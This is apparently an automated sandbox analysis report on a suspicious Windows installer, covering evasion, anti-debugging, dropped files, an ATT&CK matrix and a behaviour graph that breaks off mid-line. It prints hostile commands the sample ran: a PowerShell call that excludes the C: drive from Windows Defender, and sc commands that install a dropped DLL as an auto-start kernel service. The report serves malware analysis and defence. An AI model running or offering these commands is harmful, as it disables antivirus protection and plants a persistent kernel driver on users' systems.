Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4297Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5542Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow / User API: threadDelayed 544Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow / User API: threadDelayed 539Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpWindow / User API: threadDelayed 537Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-U9N4C.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CCF98B0 FindFirstFileA,FindClose,FindClose,6_2_6CCF98B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_005A6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_005A7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A9C60 GetSystemInfo,10_2_005A9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000002.1798390794.0000000000FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000002.1798390794.0000000000FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB83886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6CB83886
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD0EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CD0EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_006257D0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD0DF9D mov eax, dword ptr fs:[00000030h]6_2_6CD0DF9D
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD18B86 mov eax, dword ptr fs:[00000030h]6_2_6CD18B86
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD18B55 mov eax, dword ptr fs:[00000030h]6_2_6CD18B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD0EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CD0EFA1
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD07ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CD07ADD

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDD5700 cpuid 6_2_6CDD5700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005AAB2A GetSystemTimeAsFileTime,10_2_005AAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00640090 GetVersion,10_2_00640090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory321
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579756 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 88 90 Multi AV Scanner detection for submitted file 2->90 92 Found driver which could be used to inject code into processes 2->92 94 PE file contains section with special chars 2->94 96 2 other signatures 2->96 10 #U5b89#U88c5#U52a9#U624b_2.0.7.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b_2.0.7.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 27 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b_2.0.7.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 